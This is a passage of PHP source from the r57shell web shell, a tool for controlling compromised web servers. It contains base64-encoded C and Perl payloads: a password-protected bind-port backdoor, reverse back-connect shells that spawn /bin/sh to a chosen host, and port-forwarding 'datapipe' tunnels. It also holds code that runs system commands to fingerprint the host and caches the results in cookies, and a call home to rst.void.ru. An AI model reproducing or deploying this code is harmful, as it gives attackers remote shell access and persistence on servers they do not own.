1323 $this->ResultFiles = Array();
1324 $this->FileMatchesCount = Array();
1325 $this->titles = Array();
1326 }
1327 function GetFilesTotal() { return $this->FilesTotal; }
1328 function GetTitles() { return $this->titles; }
1329 function GetTimeTotal() { return $this->TimeTotal; }
1330 function GetMatchesCount() { return $this->MatchesCount; }
1331 function GetFileMatchesCount() { return $this->FileMatchesCount; }
1332 function GetResultFiles() { return $this->ResultFiles; }
1333 function SearchText($phrase=0,$case=0) {
1334 $qq = @explode(' ',$this->text);
1335 $delim = '|';
1336 if($phrase)
1337 foreach($qq as $k=>$v)
1338 $qq[$k] = '\b'.$v.'\b';
1339 $words = '('.@implode($delim,$qq).')';
1340 $pattern = "/".$words."/";
1341 if(!$case)
1342 $pattern .= 'i';
1343 foreach($this->FilesToSearch as $k=>$filename)
1344 {
1345 $this->FileMatchesCount[$filename] = 0;
1346 $FileStrings = @file($filename) or @next;
1347 for($a=0;$a<@count($FileStrings);$a++)
1348 {
1349 $count = 0;
1350 $CurString = $FileStrings[$a];
1351 $CurString = @Trim($CurString);
1352 $CurString = @strip_tags($CurString);
1353 $aa = '';
1354 if(($count = @preg_match_all($pattern,$CurString,$aa)))
1355 {
1356 $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
1357 $this->ResultFiles[$filename][$a+1] = $CurString;
1358 $this->MatchesCount += $count;
1359 $this->FileMatchesCount[$filename] += $count;
1360 }
1361 }
1362 }
1363 $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
1364 }
1365 }
1366 function getmicrotime()
1367 {
1368 list($usec,$sec) = @explode(" ",@microtime());
1369 return ((float)$usec + (float)$sec);
1370 }
1371 $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
1372 A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
1373 GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
1374 b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
1375 pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
1376 NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
1377 ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
1378 ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
1379 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
1380 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
1381 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
1382 dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
1383 lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
1384 $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
1385 VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
1386 JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
1387 TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
1388 lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
1389 Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
1390 Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
1391 lIENPTk47DQpleGl0IDA7DQp9DQp9";
1392 $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
1393 aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
1394 hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
1395 sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
1396 kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
1397 KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
1398 OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1399 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
1400 BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
1401 SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
1402 KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
1403 sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
1404 Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
1405 QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
1406 Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1407 $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
1408 x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
1409 HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
1410 aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
1411 lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
1412 xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
1413 W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
1414 LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
1415 udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
1416 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
1417 iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
1418 KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
1419 gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
1420 hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
1421 iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
1422 ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
1423 vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
1424 AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
1425 QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
1426 ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
1427 gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
1428 wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
1429 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
1430 MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
1431 gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
1432 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
1433 HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
1434 dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
1435 KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
1436 ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
1437 E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
1438 Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
1439 NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
1440 J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
1441 CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
1442 dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
1443 gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
1444 lsZSk7DQogIHJldHVybiAwOw0KfQ==";
1445 $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
1446 CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
1447 bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
1448 gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
1449 NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
1450 iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
1451 aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
1452 SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
1453 xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
1454 WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
1455 CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
1456 yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
1457 I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
1458 m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
1459 IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
1460 lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
1461 QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
1462 CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
1463 c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
1464 NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
1465 UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
1466 DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
1467 ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
1468 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
1469 $c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
1470 JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
1471 lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
1472 FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
1473 3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
1474 J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
1475 oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
1476 xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
1477 i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
1478 dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
1479 ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
1480 hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
1481 $c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
1482 IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
1483 hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
1484 tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
1485 XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
1486 8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
1487 ybmV0LS0+";
1488 if($unix)
1489 {
1490 if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
1491 if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
1492 if($safe_mode) { $sysctl = '-'; }
1493 else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
1494 else
1495 {
1496 $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
1497 if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
1498 if(empty($sysctl)) { $sysctl = '-'; }
1499 setcookie('sysctl',$sysctl);
1500 }
1501 }
1502 echo $head;
1503 echo '</head>';
1504 if(empty($_POST['cmd'])) {
1505 $serv = array(127,192,172,10);
1506 $addr=@explode('.', $_SERVER['SERVER_ADDR']);
1507 $current_version = str_replace('.','',$version);
1508 if (!in_array($addr[0], $serv)) {
1509 @print "<img src=\"http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
1510 @readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}}
1511 echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(2).'<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
1512 echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
1513 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
1514 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
1515 if($unix)
1516 {
1517 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
1518 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
1519 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb;
1520 }
1521 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
